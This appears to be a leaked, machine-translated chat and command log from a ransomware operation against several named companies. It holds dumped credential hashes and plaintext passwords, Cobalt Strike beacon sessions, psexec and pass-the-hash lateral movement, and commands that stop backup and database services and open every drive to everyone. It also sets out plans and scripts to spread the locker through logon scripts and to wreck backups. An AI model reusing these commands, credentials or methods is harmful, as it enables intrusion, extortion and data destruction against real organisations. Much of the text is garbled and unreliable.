	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 65920 (00000000:00010180)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID :
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : L-7NB3HC2$
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : l-7nb3hc2$
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``I can't get to them on my desktop in browserox4proxy only from my ipi, as I understand it```.
SSL VPN
Address Https://173.12.52.229
System administrator Usrname/password dadmin/w3r3g00d
SSl VPN user midawivpn/m1daw1vpn
``````
ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Site Locations\Nashville\Continuant_Setup_TN-OR.doc
FileOwner : TELECOMLABSINC\richards
Size : 78848
DateCreated : 2/7/2020 3:11:15 PM
DateAccessed : 2/7/2020 3:11:15 PM
AutoSummary :
Continuant MAP Service Location Remote Access Data Sheet
World Vision - Nashville & Portland
Critical Info Needed to Begin Monitoring Setup (ASAP)
Call, email, or fax this critical info to PM listed below:
Customer Business Name and Location: World Vision
277 Mallory Station Rd., Suite 130, Franklin, TN 37067 Switch Dialup Number: 192.168.242.98 Switch Login: continuant SEB Password (if installed) Switch Password: R3mot3!
``````
ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Remote Access Information\Nortel-VPN-Login.txt
FileOwner : TELECOMLABSINC\richards
Size : 40
DateCreated : 2/7/2020 3:11:09 PM
DateAccessed : 2/7/2020 3:11:09 PM
AutoSummary :
username : continuant
password: e3nkq49v
``````
  Target : autologon.microsoftazuread-sso.com
  UserName : richards@continuant.com
  Password : MyW0rdPassW0rd!
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 2/24/2020 11:30:58 AM
``Then you need to look for configurationsHours ago domain was responding, now it won't respondNet-GPPPassword seems to be down
```
[RESULT] Username: Administrator
[RESULT] Changed: 2015-02-06 18:27:57
[RESULT] Password: $6t]:sw2@3ed
``````
beacon> net domain
[*] Tasked beacon to run net domain
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 87853 bytes
[+] received output:
telecomlabsinc.com
[+] received output:
Domain Controllers:

[-] Error: 0

beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
TELECOMLABSINC\Domain Admins
TELECOMLABSINC\richards
TOSA
The command completed successfully.


beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
art.admin chrisma.admin daniel.admin
MSSQL ServerAdmin$ sissel.admin
svc_cisco_ldap
The command completed successfully.


beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
chrisma.admin daniel.admin ServerAdmin$
The command completed successfully.


Good night good night everybody remember to ask and help each other and also go home so as long as there are no questions still 20 min + approached the password I say sticky notes or something like that tomorrow by 3 so you in the water check their desktop on the rdp for notes on it2) if there are questions then ask1) take the archive with builds so the password will passThanks)not before 12 home, I hope you close one network at least) Merry Christmas!Merry Christmas to all!!! Tomorrow by 3:30 workpozapozavlya forgot that yesterday was a holidayWe merry Christmas to all) pure koba!
23.106.223.123
https://tagdel.com
----------------------------------------------------------------------------------------
192.111.147.254:45008
RqwB6Sj9MH8NKzVrm9Xllv8uLBQWxZryhtM
``SIDH*G&8SDIGvS*DIF^*GSHIGUYRH``mailsniper works through the sameExchange administrator (i.e. member of "Exchange Organization Administrators" or "Organization Management" group)water path in the same network+- ExchangeOrganization Management in EAC the account with backup access should be in the group in other cases under the tops are directors, chief accountants, etc, If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.if it's not internal, it's external if there are no mail servers in the network, do we skip it?
in evo have not yet found and it seems that it is not tor the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web1 network 1 account can leave or every time a new registrar?the question you take backups that waymaybe someone else read this dialogue today in #water-way @user8 learned how to download fat files from the network a couple of things who do not know i wait in the groups info from additional tasks as well give out +1 cobu prozapasyasya you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confusa tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + lf you remember about the additional tasks on the networks?a couple of announcements so everyone distract yourselves it's waterwaypo rdp hooked up to harper and reading slack#ballymoregroup-com#evo-com#waterway-com
#1-done-rtpcompany-com+so I take it we have four networks in the works?
SCCY-DC.sccy.local
TS.sccy.local
SCCY-FS.sccy.local
``````
www.sccy.com
antivirus.sccy.com
autodiscover.sccy.com
host.sccy.com
rd.sccy.com
www.rd.sccy.com
remote.sccy.com
www.remote.sccy.com
server.sccy.com
server2.sccy.com
store.sccy.com
www.store.sccy.com
ts.sccy.com
www.ts.sccy.com

``http://10.0.0.4:5000/webman/login.cgi?enable_syno_token=yes''.
setg Proxies socks4:209.222.101.167:1488
``but they're sly foxes yes, there's been a fortune in it... and there's like a ntds taken down...``
https://connect.globaltranz.com/login?redir=%2Fng
the first 3 are just not available? the first 2 seem to have got encrypted today in the last one where it was allowed to go in and wiped the rest too?
beacon> shell dir \\\dcwas79.Wilsonart.com\D$
[*] Tasked beacon to run: dir \\dcwas79.Wilsonart.com\D$
[+] host called home, sent: 61 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell dir \\dcveeam01.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\dcveeam01.Wilsonart.com\F$
[+] host called home, sent: 63 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell dir \\\bod01-bkp01.eu.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\bod01-bkp01.eu.Wilsonart.com\F$
[+] host called home, sent: 68 bytes
[+] received output:
The network path was not found.
```
 
`nas_signature.polyrey.net` this one was wiped through the web face
 
```
beacon> shell dir \\BBDC03.bushboard.co.uk\C$
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\C$
[+] host called home, sent: 62 bytes
[+] received output:
The network path was not found.
``That's how the slf.local fell off, they were pulled in.``
```
beacon> shell dir \\192.168.3.8\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.8\C$\readme.txt
[+] received output:
The specified network name is no longer available.
```
```
beacon> shell dir \\192.168.3.7\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.7\C$\readme.txt
[+] host called home, sent: 62 bytes
[+] received output:
The specified network name is no longer available.
and give me a full hell of a lot more info from all domains[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=penupTybFst3QZhiF) that way2-3 files from file servers and backups will be enough then i'm waiting for listings now the exe file on armas was released on the rest of the drives in this domain only dk came from somewhere else? yeah, now even the buck will not let in earlier i came in where there is no buck will not let in `` ``
Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A networ
not all of the shares[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=6uBj3ySA2pTDJoM4w) didn't let me in? where did it let me in - erasing bushboard backups didn't touch it so dir \\host\share\* /s > out.txt+ can take backups file structures then specify info about it somewhere not let me in under DA not all domains are alive I couldn't tell you, did the sharing scheme work?i can't tell where it's not - i'm getting to some of the files that have been uploaded, they all crashed out at oncearms now i'm checking[ ](https://mediaeveryone.com/group/1-done-wilsonart-com?msg=6QYAwTYx9t5mDs7aB) stats are up what aboutarms? they say you have 2-3 servers that are not working? 1.done.wilsonart.comok, from the neighboring try not checked, but it is better not to try, I do not know how the locker injected into one pid in two variants in general behaves[ ](https://mediaeveryone.com/group/wilsonart-com?msg=MaZfrEJ9pdfnTstjF) and so not from a separate session can? *trashbackup files are hard to restore and damaged easily enough ... but after rm it's better to dump the garbage anyway free space if you are already switched off to sleep and everything else is done - you can rm too =)so can rm ?)so you can dump the backups any way you want and don't want to get damaged without restoring them, because if they get a decryptor they will in any case restore the workstations and servers in their last state or use -nomutex flag from a "separate" sessionbut for that it is better to slow down the current process of blockingmay try right now by adding the path flag and -size 15 for example
to corrupt 15% of files in the directory where backups are kept theoretically, you can set a locker on backups with -size flag to reduce corruptions percentage for speed reasons- even 10% is not enough- backups are encrypted for a long time- check hosts where sessions are dead after lock process start check and if all ok, go have a rest- so, if everything is started, 20 minutes asleep, have some breakfast and in 20 minutes do control check
re-piping all hosts, see if new hosts have not declared, if the process is running correctly on all where it was started if there is huge data - and it will take a long time to do - delete what has not had time to crypto appear to them all fine, please check the files snapshots latching by hand snapshots in the sphere and did not happen)
the server where snapshots were stored is locked by crypt
is there a rdmi/snapshots deleted/encrypted? virtualization was found - snapshots were taken and flown to a backup on a win-server
nasa was accessed, their disks were primed.
backups were stored on vin servers superficially watching the case, tell me what is it with backups/nas/virtualization wait 20-30 minutes and do a manual check on all servers and armas
about the re-injection got it
the files just didn't show up
```
if a session did not die after the first injection, probably there is a file queue and you should be patient it means a segment delimitation with Cisk as the fv playing the role of re-injection
the files didn't show up so you're trying to ping the host
titty
```
who's that? ciscar? or isis?
Bottom line:

Wilsonart.com.
srv: 125 (3 disks/nixes) / 128
arm: shared disks

uk.Wilsonart.com
srv: 22 / 22
arm: 44 / 44
 
eu.Wilsonart.com
srv: 36 / 36
arm: 2 / 2
 
cn.Wilsonart.com
srv: 1 / 1

WI.RWP.COM.
srv: 27 / 31 (1 was not approached by admins, two did not have 445, 1 was not wind)
arm: unshared

SLF.LOCAL
srv: 8 / 8
arm: 6 / 8 (repping occurred)
 
resopal.lan
srv: 26
arm: all shared

ralpwilson.com
srv: 1 / 1
 
polyrey.net
srv: 52 / 53 (1 was not approached by admins)
arm: 28 masked
 
BUSHBOARD.CO.UK
srv: 10 / 10
arm: 17 mashed up
 
arborite.com
srv: 9 / 9
arm: all armas are shared
``This could have unpredictable effects on file recovery if the flagwot is not written in time.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 222831 bytes
[+] received output:
Injected.
``This is not the way to do it.
i see on some of the sessions, i'll prepare the status, everything works, then da mount yes run at once on this 2003 no vu some awful there is also e meets in this griddiskonnect incidentally often almost instantaneous and there were only C-drives? no more? well, will have to re-mount) there are many in the domains do not stretch this in the same domain `` ``
Status Local Remote Network

-------------------------------------------------------------------------------
Disconnected L:        \170.7.122.153\c$ Microsoft Windows Network
Disconnected M:        \170.7.25.7\c$ Microsoft Windows Network
Disconnected N:        \170.7.34.75\c$ Microsoft Windows Network
Disconnected O: \170.7.38.21\c$ Microsoft Windows Network
Disconnected P:        \170.7.9.19\c$ Microsoft Windows Network
Disconnected Q:        \170.7.183.5\c$ Microsoft Windows Network
Disconnected R:        \170.7.5.11\c$ Microsoft Windows Network
Disconnected S:        \170.7.24.25\c$ Microsoft Windows Network
Disconnected T:        \170.7.123.166$ Microsoft Windows Network
Disconnected U:        \170.7.76.123$ Microsoft Windows Network
Disconnected V: \170.7.121.129$ Microsoft Windows Network
Disconnected W:        \170.7.183.97\c$ Microsoft Windows Network
Disconnected X:        \170.7.183.84\c$ Microsoft Windows Network
Disconnected Y:        \170.7.123.168$ Microsoft Windows Network
Disconnected Z:        \170.7.123.224$ Microsoft Windows Network
```
:zany_face:what about the others? ``
170.7.20.230:445
170.7.2.30 not 445 here
170.7.110.205.
170.7.44.212:445 (platform: 500 version: 5.2 name: TNTAS03 domain: WI)
then in the dry residue look at those that do not have enough rights to if we miss something - it is not fatal, but the lock should already start, let die those hosts that are attracted and lured so
Tell me for all the domains what statistics and how many not attracted or not muzzled
172.22.190.10
172.22.190.11
10.40.60.50
``I'm already confused by the name of this nor170.7.2.30 this nor170.7.44.212:445a ping -a gave out this namewi.rwp.comnu the domain name so it means they are in a WI domain of some kind```
TNTAS03.WI.RWP.COM
hqtov02.WI.RWP.COM
``````
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:55:00> shell net use * \\172.25.168.150\C$
[*] Tasked beacon to run: net use *\\\172.25.168.150\C$
[+] host called home, sent: 60 bytes
[+] received output:
Le mot de passe n'est pas valide pour \\172.25.168.150\C$.

Entrez le nom d'utilisateur de '172.25.168.150':
```
i tried with different tokens, no one is good with this dnshostname. as long as they are domain hosts, they should not be in adc, they are not in adcom, tntas01 / tntas02hqtov01 maybe there```.
hqtov02.rwp.com [170.7.2.30]
tntas03.rwp.com [170.7.44.212]
``Look who the admins are there, I don't know...
they have neighbors with the same hostname that the admins don't pass two or more ``
170.7.20.198
170.7.14.22
170.7.120.225
170.7.20.103
172.25.168.89
``This four do with them[ ](https://mediaeveryone.com/group/wilsonart-com?msg=8qFm4k6XxFM8ZoxQJ) well exactly 170.7.20.230:443
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:49:56> shell net use *\\172.25.170.69\C$
[*] Tasked beacon to run: net use *\\\172.25.170.69\C$
[+] host called home, sent: 59 bytes
[+] received output:
L'erreur système 53 s'est produite.

Le chemin réseau n'a pas été trouvé.

```
There's no 170.7.110.205 in Tatar at all, it's 445.
170.7.20.230:445
``````
there is no such subnet here as admins, but only in another one in the main domain, the LA did not come through from there
```
have you tried the enterprise? is everything pulled up/administered? or are there any problems as well? i see, how are the others doing? these two do not connect to cmblogin, the first one is not in ad_compact
```
fltov02.rwp.com [170.7.20.230]
hqtas28.wilsonart.com [170.7.110.205]
```
here didn't pass as YES admins, and this subnet is only in another one in the main domain, LA didn't pass from there
```
hqtov02.rwp.com [170.7.2.30]
tntas03.rwp.com [170.7.44.212]
``pth resopal.lan\admig 4654a6461da41310e51da91aaa7011da including local admin to re-check the kredna pack the rest can you smb_login the othersDAfowlerhas the others pulled up? or just from another point? the others have pulled up on these while I am going through YES ``
170.7.20.230 -
170.7.2.30 -
170.7.110.205 -
170.7.44.212 -
```Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf37093fda2e2d172732487707cd31:::
170.7.5.* for example i would try the server local admin from servers which are in the same subnet how many you have left? maybe under the other will be under this yes no kayfiz under yes no right such things
you just don't have rights to the ones you can't open. [-] could not open \170.7.20.230\c$*:
[-] could not open \170.7.5.75\c$*:
[-] could not open \170.7.2.30\c$*:
[-] could not open \170.7.5.10\c$*:
[-] could not open \170.7.76.123\c$*:
[-] could not open \170.7.5.11\c$*:
[-] could not open \170.7.110.205\$*:
[+] established link to child beacon: 170.7.110.16
[+] established link to child beacon: 170.7.10.204
[+] established link to child beacon: 170.7.41.213
[-] could not open \170.7.44.212.{\c$\*:because it's not finished yet
for these binary binary generated by bind pipes, artifact doesn't work while it doesn't work under swtz, but it's about service creation (only if it's not done) @tl2 don't you just use new artifact?
170.7.41.214 -
170.7.55.114 -
170.7.20.230 -
170.7.5.75 -
170.7.2.30 -
170.7.5.10 -
170.7.76.123 -
170.7.5.11 -
170.7.110.205 -
170.7.110.16 -
170.7.10.204 -
170.7.41.213 -
170.7.44.212 -

``````
beacon> jump psexec 170.7.5.10 smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.5.10 via Service Control Manager (\\170.7.5.10\ADMIN$\56b5cb5.exe)
[+] host called home, sent: 287642 bytes
[-] could not upload file: 5
[-] Could not open service control manager on 170.7.5.10: 5
[-] Could not connect to pipe: 2
which didn't connect, don't make a screenshot, make a list of hosts i had an error with the same host i don't know what to say :-)check my log 1908 with which pead? everything works...well...
[beacon> jump psexec 170.7.41.214 smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.41.214 via Service Control Manager (\170.7.41.214\ADMIN$\16e208c.exe)
[+] host called home, sent: 287736 bytes
[+] received output:
Started service 16e208c on 170.7.41.214
[+] established link to child beacon: 170.7.41.214
That's what I meant about the disk ball
```
C:/Windows\system32\net1 stop samss /y
C:Windows\system32/net1 stop veeamcatalogsvc /y
C:Windows\system32/net1 stop veeamcloudsvc /y
C:Windows\system32/net1 stop veeamdeploysvc /y
C:Windows\System32/net.exe stop samss /y
C:Windows\System32/net.exe stop veeamcatalogsvc /y
C:Windows\System32/net.exe stop veeamcloudsvc /y
C:Windows\System32/net.exe stop veeamdeploysvc /y
C:³Windows\System32\taskkill.exe /IM sqlbrowser.exe /F
C:Windows\System32\taskkill.exe /IM sqlceip.exe /F
C:{Windows\System32\taskkill.exe /IM sqlservr.exe /F
C:{Windows\System32\taskkill.exe /IM sqlwriter.exe /F
C:{Windows\System32\taskkill.exe /IM veeam.backup.agent.configurations.exe /F
C:\Windows\System32\taskkill.exe /IM veeam.backup.brokerservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.catalogdataservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.cloudservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.externalinfrastructure.dbprovider.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.manager.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.mountservice.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.service.exe /F
C:³Windows\System32\taskkill.exe /IM veeam.backup.uiserver.exe /F
C:Windows\System32\taskkill.exe /IM veeam.backup.wmiserver.exe /F
C:{Windows\System32\taskkill.exe /IM veeamdeploymentsvc.exe /F
C:{Windows\System32\taskkill.exe /IM veeamfilesysvsssvc.exe /F
C:\Windows\System32\taskkill.exe /IM veeam.guest.interaction.proxy.exe /F
C:\Windows\System32\taskkill.exe /IM veeamnfssvc.exe /F
C:³Windows\System32\taskkill.exe /IM veeamtransportsvc.exe /F
C:{Windows\system32\taskmgr.exe /4
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

net share c=c: /grant:everyone,full
net share d=d: /grant:everyone,full
net share e=e: /grant:everyone,full
net share f=f: /grant:everyone,full
net share g=g: /grant:everyone,full
net share h=h: /grant:everyone,full
net share i=i: /grant:everyone,full
net share j=j: /grant:everyone,full
net share k=k: /grant:everyone,full
net share l=l: /grant:everyone,full
net share m=m: /grant:everyone,full
net share n=n: /grant:everyone,full
net share o=o: /grant:everyone,full
net share p=p: /grant:everyone,full
net share q=q: /grant:everyone,full
net share r=r: /grant:everyone,full
net share s=s: /grant:everyone,full
net share t=t: /grant:everyone,full
net share u=u: /grant:everyone,full
net share w=w: /grant:everyone,full
net share v=v: /grant:everyone,full
net share x=x: /grant:everyone,full
net share y=y: /grant:everyone,full
net share z=z: /grant:everyone,full



icacls C:\* /grant Everyone:F /T /C /Q
icacls D:\* /grant Everyone:F /T /C /Q
icacls E:\* /grant Everyone:F /T /C /Q
icacls F:\* /grant Everyone:F /T /C /Q
icacls G:\* /grant Everyone:F /T /C /Q
icacls H:\* /grant Everyone:F /T /C /Q
icacls I:\* /grant Everyone:F /T /C /Q
icacls J:\* /grant Everyone:F /T /C /Q
icacls K:\* /grant Everyone:F /T /C /Q
icacls L:\* /grant Everyone:F /T /C /Q
icacls M:\* /grant Everyone:F /T /C /Q
icacls N:\* /grant Everyone:F /T /C /Q
icacls O:\* /grant Everyone:F /T /C /Q
icacls P:\* /grant Everyone:F /T /C /Q
icacls Q:\* /grant Everyone:F /T /C /Q
icacls R:\* /grant Everyone:F /T /C /Q
icacls S:\* /grant Everyone:F /T /C /Q
icacls T:\* /grant Everyone:F /T /C /Q
icacls U:\* /grant Everyone:F /T /C /Q
icacls V:\* /grant Everyone:F /T /C /Q
icacls W:\* /grant Everyone:F /T /C /Q
icacls X:\* /grant Everyone:F /T /C /Q
icacls Y:\* /grant Everyone:F /T /C /Q
icacls Z:\* /grant Everyone:F /T /C /Q

``The error was the same, but the conclusion sailed away,`` the disks were scrambling,`` the servers were dragging,`` the servers were dragging,`` 908.
104.194.10.161:53256
KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi
```о
just in time) so what's up? let me see for myself tell me what session yes tokenblin
give me access to the server where you're working with the domain what about it dllkapo https is not jumping on the case so it blames on the sharingvot error on top of what blames? you rubbed aver ... you were just shredding with anwer... it shouldn't be a bindpipe... but the cmb is bindpipe... try the servers that are not bindpipe-attracted... it's all cmb-attracted... and the servers that are dell-pipe... it says when we try to share disks on the armas...
Win32 Error: The process cannot access the file because it is being used by another process.


``Snow the skinoon is shitting with an error only through smb through delki and httpsc.wilsonart.com\-admin-bownem 361ab72479515c09284591c50cebfe23 how is it not shitting?
If you already have domain mapped, can we just lock the domains we already have?
```
yes, you can at once@tl2 @tl1 those domains that are already primatted and attracted can we lock immediately ?
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe`
    logn: fowlerh@wilsonart.com
    pass: R3f1nn3j2!

    Wilsonart.com\Administrator DA
    {}wallC2013

    Wilsonart.com\roeders DA
    Dell@2020
but i don't have any clean ones((
try paiload to the ipi instead of the domainlit and more than 100k do not limit if the coba has a limit of 100k and a lot of servers come out do not knocka why?
does not knock something somewhere? he supposed to come back if it does not shut down with the ends (it should @tl1 wait(
i don't have @tl1@tl2 answer two clean coba?
beacon> shell ping HQTAS37
[*] Tasked beacon to run: ping HQTAS37
[+] host called home, sent: 43 bytes
[+] received output:
Ping request could not find host HQTAS37. Please check the name and try again.
```
```
beacon> shell ping HQTAS65
[*] Tasked beacon to run: ping HQTAS65
[+] host called home, sent: 43 bytes
[+] received output:
Ping request could not find host HQTAS65. Please check the name and try again.
´´but there is an isolated sabnet or something randomly pinged a little hands those who did not respond to the list from hell, hit the eheskoy, it came out only alive in the same sabnet where the disabled others pinged ok ?
disconnected must be
the other servers are not pinging because they are old/disconnected or there is no route to them?
WI.RWP.COM
srv: 31 / 60
arm: 122 / 515
Go to the root
the root is always better from there for some reason)why not just put it in the root C ?
```
copy \DCWAS01\SYSVOL\Wilsonart.com\scripts\1.exe C:{\windows && C:\windows\1.exe

``Well, the locker does not seem to touch the executable files, in theory it should work)``Tried it, I just do not know if the current build encrypts logon scripts to be honest :smile:to know for surehttp://www://www/web/v78/logon_agent/la_configure_scriptspx#:text=In%20%20theGroup_scripts.websense.com/content/support/library/web/v78/logon_agent/la_configure_scripts.aspx#:~:text=In%20the%20Group%20Policy%20Management,Logon%20in%20the%20right%20pane.&text=In%20the%20Logon%20Properties%20window,Scripts\Logon\%20is%20displayed.and who tried something like this before? to come and finish it themselves so let's make a blank for the rest) not the fact that the domain authorization will fall off so by the time people come to the domain will fuck up. especially on weekends and holidays. it's Christmas they have a logon script, and how? and more additional tasks)
 then add copying and launching the locker to the logon scripts)
and the ox isn't needed
people will come to work, turn on the car
and lock themselves in peace
the date on armatures locks in minutes if not seconds

``Then readiness 10 min)`` and so on? builds dll lists and host lists have prepared themselves commands work in tempav + vindefrule av and start? snp no so well general alg, is to scatter batnik on shary disks from the armas to report by hand finishdana vmik and kopismozhet do rait errors?aha it is possible, but it is long, kapetspravdi threads ... they have a variant with a list of hosts + startup from systems + output and tdmb by the way in general take the same psek from the ms what to psek there? track the total errors?'nj nfr vj;yj ghbnzyenm cthdfrb yfghbvth ``

copy %dll% \\\%1\admin$
wmic /node:%1 process call create "rundll32 c:\windows\%dll% entryPoint"
Right? this gotch throws it in and runs it as a parameter. the batcnik throws it in and runs it[ ](https://mediaeveryone.com/group/wilsonart-com?msg=nsZeWcy8AxyCneT7n) .haven't made a batcnik yet. most likely?) most likely. what do we write in the batcnik? and run what? take an ip from the list, if it pings we call the batch, which takes the ip as a parameter. the batcnik throws it in and runs it. everything in the fucking streams.
```
uk.Wilsonart.com
srv: 1 / 1
```
it's actually this
```
cn.Wilsonart.com
srv: 1 / 1
``in a nutshell the algorithm is like this ``rfr nj nfrsharpsharesng ips list.txt --alive -exec pull.By the way how do you solve the mass spreading of the eche?
WI.RWP.COM
srv: / 60
arm: / 515
 
polyrey.net
srv: 53 / 64
arm: 45 / 340
 
eu.Wilsonart.com
srv: 36 / 43
arm: 2 / 10

resopal.lan
srv: 26 / 27
arm: 11 / 100

uk.Wilsonart.com
srv: 22 / 25
arm: 44 / 157
``These 5 can be drawn from others.

BUSHBOARD.CO.UK
srv: 10 / 17
arm: 26 / 136
 
arborite.com
srv: 9 / 12
arm: 29 / 154

SLF.LOCAL
srv: 8 / 10
arm: 49 / 66

ralpwilson.com
srv: 1 / 1

uk.Wilsonart.com
srv: 1 / 1
``Map the servers unreachable, tasklist cut off the crisis services and while scattering attract other domains then scatter the file that will shasharit disks and stuff on armasperechtalivayut itdasy question) with small or large domain will start?they were not, but I'll walk to be sure on the classic drop snaps if any then skipkey (we sent a broadcast but no one woke up check on the default settings yesvole in biose should be turned on, right?yes you can go there quietly as you turn it off from the main domain in that domain found7 from other domains can only see the dkpod YES of the entrance domain have access thereto from another domain to mask its serverspolozhdeny trust has anything with anything?
WI.RWP.COM
srv: / 60
arm: / 515
``Let's think about merging
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Backup

21/10/2020 21:25 <DIR> .
21/10/2020 21:25 <DIR> .
21/10/2020 21:25 11,334 Backup.vbm
21/10/2020 21:25 357,040,234,496 BackupD2020-10-21T204800_278E.vbk
               2 File(s) 357,040,245,830 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Daily

26/12/2020 21:22 <DIR> .
26/12/2020 21:22 <DIR> .
26/12/2020 21:22 277,452 Daily.vbm
26/12/2020 21:19 8,877,858,816 DailyD2020-12-22T210026_0A86.vrb
26/12/2020 21:20 5,325,545,472 DailyD2020-12-23T210030_4C1A.vrb
26/12/2020 21:22 3,240,009,728 DailyD2020-12-24T210037_9249.vrb
26/12/2020 21:22 2,230,308,864 DailyD2020-12-25T210022_FD90.vrb
26/12/2020 21:22 989,772,115,968 DailyD2020-12-26T210030_B7DE.vbk
               6 File(s) 1,009,446,116,300 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Full Backup

10/10/2020 21:35 <DIR> .
10/10/2020 21:35 <DIR> .
10/10/2020 21:35 1,952 Full Backup.vbm
               1 File(s) 1,952 bytes
               2 Dir(s) 7,410,316,644,352 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\VCenter

26/12/2020 20:05 <DIR> .
26/12/2020 20:05 <DIR> .
26/12/2020 20:05 366,006 VCenter.vbm
12/12/2020 20:04:21,046,738,944 VCenterD2020-12-12T200342_5ADE.vbk
13/12/2020 20:03 709,451,776 VCenterD2020-12-13T200034_237F.vib
